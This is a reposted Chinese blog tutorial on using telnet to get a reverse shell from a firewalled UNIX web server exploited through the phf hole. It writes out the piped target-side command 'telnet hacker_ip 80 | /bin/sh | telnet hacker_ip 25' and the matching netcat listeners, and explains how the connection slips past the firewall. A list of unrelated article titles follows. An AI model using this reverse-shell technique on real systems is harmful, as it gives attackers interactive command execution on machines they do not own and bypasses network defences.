如何使用telnet进行反向连接
来源:互联网 发布:做淘宝如何和快递公司 编辑:程序博客网 时间:2024/06/05 15:51
原文链接 http://www.91ri.org/7835.html
解决的思路有点意思,所以转过来
telnet反向连接在实战中的作用:
案例1:黑客试图获取某工业级数据包检测防火墙或者路由器之后(基于路由的防火墙,不代理任何服务)的一台UNIX的系统的WEB服务器的访问权。防火墙仅对外网开放了80及443,这台WEB服务器存在phf漏洞(phf漏洞是什么自行脑补),黑客可远程对该web服务器执行命令。此时就可以通过unix自带的telnet获取到一个交互式的SHELL。(91ri.org补充:因为之所以不用NC是因为服务器一般都有安装telnet,且很少受到限制。而connect又是从目标主机中发起,所以可以达到穿透防火墙及内网的作用。)
环境假设:
target ip : 192.168.128.105
hacker ip:192.168.128.100
telnet 反向连接命令:
target :
/usr/bin/telnet 192.168.128.100 80 |/bin/sh |/usr/bin/telnet 192.168.128.100 25
hacker:
/opt/netcat/bin/nc -l -n -v -p 80
/opt/netcat/bin/nc -l -n -v -p 25
命令说明:实际上我们是将telnet连接到hacker的80端口的NC上,为了与传统的unix的输入输出机制保持一致,我们通过标准输出即键盘通过管道输给了Bourne shell。而由/bin/sh 执行命令的结果再通过管道输出telnet,并返回到hacker的25端口的NC上。
本文来自: 网络安全攻防研究室(www.91ri.org) 请尊重作者,转载时带上版权信息。 详细内容请参考:http://www.91ri.org/7835.html
0 0
- 如何使用telnet进行反向连接
- win7之telnet如何连接与使用
- java连接telnet进行操作
- java连接telnet进行操作
- 反向telnet
- 反向TELNET
- 使用telnet 进行http测试
- 使用telnet进行发送邮件
- 使用telnet进行http测试
- 如何使用VC进行HTTP连接
- 使用Nodejs进行反向代理
- telnet如何岁memcached进行操作。
- Impinj Spedway 在使用 Telnet 时需要用 Putty 进行连接,并且连接类型需要选 SSH
- win7下如何使用telnet
- 反向连接后门的使用
- 使用Telnet进行SMTP/POP3/FTP/NNTP
- 如何利用powerdesigner进行反向工程
- Telnet远程服务器连接 使用和介绍
- 贪心算法总结
- Make the Change
- (总结)Ubuntu Server 12.04 静态IP简洁配置
- 冒泡排序实现数字升序排序
- 【LeetCode】Valid Palindrome
- 如何使用telnet进行反向连接
- SQLite可视化管理工具汇总
- OpenJDK源码研究笔记(十六):在Java中使用JavaScript脚本语言
- 数据导入HBase最常用的三种方式及实践分析
- Effective Objective-C Item2: 头文件中最少引入其他头文件
- Android ViewPager使用详解
- 胖虎白话学习设计模式之专业术语存在的误解
- win7---虚拟wifi无法启动承载网络
- HTTP 协议简介